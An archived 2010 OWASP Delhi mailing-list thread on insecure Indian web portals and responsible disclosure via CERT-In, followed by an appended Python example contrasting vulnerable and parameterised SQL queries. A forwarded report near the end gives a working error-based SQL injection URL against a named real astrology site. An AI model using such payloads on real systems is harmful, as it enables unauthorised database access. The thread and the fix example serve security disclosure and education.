[Owasp-delhi] Rediff Astrology

Sripathi Krishnan sripathi.krishnan at gmail.com
Wed Jun 16 08:30:29 EDT 2010


There is a problem with reporting vulnerabilities - every website has
hundreds of them spread all over. Reporting all of them requires a herculean
effort, and without buy-in from the top management of the website, it's not
going to get fixed. Our collective interest will definitely fade if we don't
see some action from the developers.

The state our websites are in, we need action from higher management. If
they don't support the initiative, there is just no way that individual
teams/developers will fix hundreds of web pages. I strongly believe we need
to influence the management to take an active interest in application
security.

So, instead of a vulnerability database, I propose organizing training
sessions for website owners/developers. Perhaps an India-wide OWASP meet,
with the stated goal of 'Increasing corporate awareness towards Application
Security'. We can perhaps have a two-day seminar, with sessions for business
folks as well as for developers and testers.

Getting sponsors should not be an issue. This also falls well within the
purview of OWASP, so we won't have any legal/political issues. We can use
our individual contacts to make sure most Indian portal owners are aware of
this seminar and have adequate representation. And we can find a lot of
people from this group to help out with the training material, seminars,
presentations and such.

I think that is the best use of the people in this group. Another database
of vulnerabilities is not going to take us too far, IMHO.

--Sri


On 16 June 2010 15:16, Soi, Dhruv <dhruv.soi at torridnetworks.com> wrote:

>  That sounds like government-supportive lang., seems you have had a good
> time with them :) No offence though, I like that.
>
>
>
> I could better think of a collective idea from Subhash's and Sriram's posts to
> have a central portal dedicated to web application breaches and flaws
> in India, just like WASC (which is global). The count of vulnerabilities
> that WASC could build over 10 years for global websites, I am sure, we can
> build a similar database for Indian web applications in around 1 year itself :)
>
>
>
> We could think of a model where a vuln. is first reported to the owner
> and CERT-IN to show our responsibility to the provider. Thereafter, give
> some time window to fix the problem. If nothing happens in the window and/or
> there is no response from the owner, we show our responsibility to the
> consumer and publish it on the portal.
>
>
>
> We can further brainstorm, keeping CERT-IN in the loop, to drive something
> fruitful. Contact me offline if any of you is interested in maturing this
> idea; we can catch up somewhere in NCR, pitch this idea as an OWASP India
> Project, participate as volunteers, and do something good for owners,
> consumers and govt.
>
>
>
> Cheers!
>
> Dhruv
>
>
>
> *From:* Subhash Dutta [mailto:subhash.dutta at kriss.in]
> *Sent:* 16 June 2010 14:43
> *To:* Sriram Lakshmanan
>
> *Cc:* owasp-delhi
> *Subject:* Re: [Owasp-delhi] Rediff Astrology
>
>
>
> I agree with this proposal. My further suggestions:
>
>  (a)  Involve CERT-In fully. This will take care of the legal hassles as
> it is their mandate.
>  (b)  Follow something like responsible disclosure, sending vulnerability
> information through a central point of contact (preferably at CERT-In).
>
> Regards
>
> Subhash Dutta
>
>
> ----- Original Message -----
> From: "Sriram Lakshmanan" <sriram_lakshmanan at uhc.com>
> To: "dhruv soi" <dhruv.soi at owasp.org>, "Subhash Dutta" <
> subhash.dutta at kriss.in>, "Sripathi Krishnan" <sripathi.krishnan at gmail.com>
> Cc: "owasp-delhi" <owasp-delhi at lists.owasp.org>
> Sent: Wednesday, June 16, 2010 1:51:28 PM GMT +05:30 Chennai, Kolkata,
> Mumbai, New Delhi
> Subject: RE: [Owasp-delhi] Rediff Astrology
>
>
>  I don't know if it can happen under the aegis of OWASP or not, but maybe
> we need something like a Jagorey campaign and a "fall of shame". I'm banking
> on this group's collective wisdom to do something...
>
>    - The Jagorey-like campaign is for the CxO forums, who are often unaware
>    of the problem in their own backyard as the tech manager never notified them
>    or didn't give them enough gyan (especially the CTO/CISO). Maybe leverage
>    NASSCOM for such forums (for contact points).
>    - The fall of shame is for sites we identify as "bad"/weak through
>    non-intrusive testing, and advise the public about the risks of the weakness
>    that exists even after notification to the company. I understand such a list
>    opens up more hacks/attacks, and thus we can refrain from displaying the
>    vulnerable URL and details of the attack. CERT-In may be leveraged for this.
>    I also do not know the complete legal interpretation of such a move (which
>    may include defamation suits).
>
> The point I'm trying to make is we know we have issues, with corporate
> indifference to security, with laws that are not enforced well, with
> "security people" just doing what I call "khanapoorti", i.e. action for the
> sake of it. The problems will not go away. As a responsible community, can
> we create a task force and collectively do something? I do understand the
> individual efforts like Nilesh's, Sripathi's or Subhash's and others' have
> fallen on deaf ears, and that is frustrating... maybe concerted and joint efforts
> will bear fruit.
>
>
>
> Additional thoughts/comments/feedback...
>
>
>
>  PS: I use "Jagorey-like" as a reference, as the Jagorey campaign is a TV advert
> showing a movement against corruption.
>
>
>
> warm regards,
>
> Sriram
>
> SEC_R_TY. U & I are in it together. Everyone's
> responsible - Everywhere
>
>
>
>
>  ------------------------------
>
> *From:* owasp-delhi-bounces at lists.owasp.org [mailto:
> owasp-delhi-bounces at lists.owasp.org] *On Behalf Of *Soi, Dhruv
> *Sent:* Wednesday, June 16, 2010 12:44 PM
> *To:* 'Subhash Dutta'; 'Sripathi Krishnan'
> *Cc:* 'owasp-delhi'
> *Subject:* Re: [Owasp-delhi] Rediff Astrology
>
> Old saying and a song – "It happens only in India". Till the time laws
> aren't enforced with force, no one is bothered about security. Even laws
> can be bypassed here, but at least a few would be trapped to set an example
> for others.
>
>
>
> When I explain India InfoSec to friends abroad, I generally blame the
> Indian mindset. Bike riders here don't care about their personal security
> and wear helmets only when there is strict police checking. The same goes for
> car drivers and their seat belts. In Delhi, we find better police checking,
> so people are serious, but in other areas like Noida, no one cares. In a
> nutshell, only strict laws can help Corporate India be secure and deliver
> securely.
>
>
>
>
>
> *From:* owasp-delhi-bounces at lists.owasp.org [mailto:
> owasp-delhi-bounces at lists.owasp.org] *On Behalf Of *Subhash Dutta
> *Sent:* 16 June 2010 09:09
> *To:* Sripathi Krishnan
> *Cc:* owasp-delhi
> *Subject:* Re: [Owasp-delhi] Rediff Astrology
>
>
>
> Yes, I have also noted the same. In fact, the imint card company stores
> passwords reversibly encrypted and will tell you in plain text what your
> password is in case you have forgotten it ;). When brought to their notice,
> I received a standard reply - "Thank you for contacting us, we will get back
> to you shortly." Nobody has got back till date (1 year past). I think
> strong legislative punitive measures are the only solution.
>
> Regards
>
> Subhash Dutta
>
>
> ----- Original Message -----
> From: "Sripathi Krishnan" <sripathi.krishnan at gmail.com>
> To: "dhruv soi" <dhruv.soi at owasp.org>
> Cc: owasp-delhi at lists.owasp.org, owasp-mumbai at lists.owasp.org,
> owasp-bangalore at lists.owasp.org
> Sent: Monday, June 14, 2010 11:25:23 PM GMT +05:30 Chennai, Kolkata,
> Mumbai, New Delhi
> Subject: Re: [Owasp-delhi] Rediff Astrology
>
> It's not just rediff.com; almost all other Indian portals - in.com,
> indiatimes.com and sify.com - have similar problems. XSS, XSRF, SQL
> Injection, poor password/session management, open redirects... the list is
> endless.
>
>
>
> I have written to each of the above portals several times in the past year,
> and have given up. IMHO, they are not interested in securing their websites.
>
>
>
> --Sri
>
> On 14 June 2010 23:17, Soi, Dhruv <dhruv.soi at owasp.org> wrote:
>
> Another one to notify Rediff that readers' daily fortune can be fixed by
> someone… Seems Rediff needs a lot of OWASP; do inform them that it's free!!
>
>
>
> *From:* “Jack H4xor”
> *Sent:* 14 June 2010 12:07
> *To:* dhruv.soi at owasp.org
> *Subject:* Rediff Astrology
>
>
>
> y0,
>
>
> h0rr1bl3 th4n h0rr0r
>
> Vulnerable Url :
>
>
> http://astrology.rediff.com/zodiaczone/astroparents-resultpg.asp?pzodiac=Scorpiox%27%20OR%201=convert%28int,@@version%29--
>
>
>
>
> Thanks & Regards
>
>
>
> Jackh4xor
>
>
>
> ( h4cky0u )
>
>
> _______________________________________________
> Owasp-delhi mailing list
> Owasp-delhi at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-delhi
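An added example, not taken from any of the e-mails in this thread, showing why the `pzodiac=Scorpiox'` probe in the forwarded report produced a database error and how the page could be written so that it does not. It uses Python with an in-memory SQLite table standing in for the MSSQL backend; the `astroparent` schema, the advice strings, the sign allow-list and the `handle_request` helper are constructed assumptions, not Rediff's code.

```python
import sqlite3
from urllib.parse import urlsplit, parse_qs

# Allow-list of acceptable values for the pzodiac parameter (assumption).
ZODIAC_SIGNS = {"Aries", "Taurus", "Gemini", "Cancer", "Leo", "Virgo",
                "Libra", "Scorpio", "Sagittarius", "Capricorn", "Aquarius", "Pisces"}


def make_db():
    """Constructed stand-in for the page's lookup table; the real schema is unknown."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE astroparent (zodiac TEXT, advice TEXT)")
    conn.executemany("INSERT INTO astroparent VALUES (?, ?)",
                     [("Scorpio", "constructed advice for Scorpio"),
                      ("Leo", "constructed advice for Leo")])
    return conn


def lookup_concat(conn, pzodiac):
    """Vulnerable pattern: the request parameter is spliced into the SQL text."""
    sql = "SELECT advice FROM astroparent WHERE zodiac = '" + pzodiac + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_param(conn, pzodiac):
    """Hardened pattern: a bound parameter can never change the statement."""
    sql = "SELECT advice FROM astroparent WHERE zodiac = ?"
    return [row[0] for row in conn.execute(sql, (pzodiac,))]


def probe_outcome(conn, pzodiac):
    """What a stray quote in the value yields under each query style."""
    try:
        lookup_concat(conn, pzodiac)
        concat = "ok"
    except sqlite3.OperationalError:
        concat = "db error"  # the SQL broke: the signal error-based injection relies on
    return concat, len(lookup_param(conn, pzodiac))


def handle_request(conn, url):
    """Request handler: allow-list the sign, bind the value, never echo DB errors."""
    sign = parse_qs(urlsplit(url).query).get("pzodiac", [""])[0]
    if sign not in ZODIAC_SIGNS:
        return {"status": 400, "body": "unknown sign"}
    try:
        rows = lookup_param(conn, sign)
    except sqlite3.Error:
        return {"status": 500, "body": "internal error"}  # generic text only
    return {"status": 200, "body": rows}
```

With the original page, the error text from the concatenated query reached the browser; the handler above keeps the server's error detail out of the response and rejects anything that is not one of the twelve sign names before the database is touched.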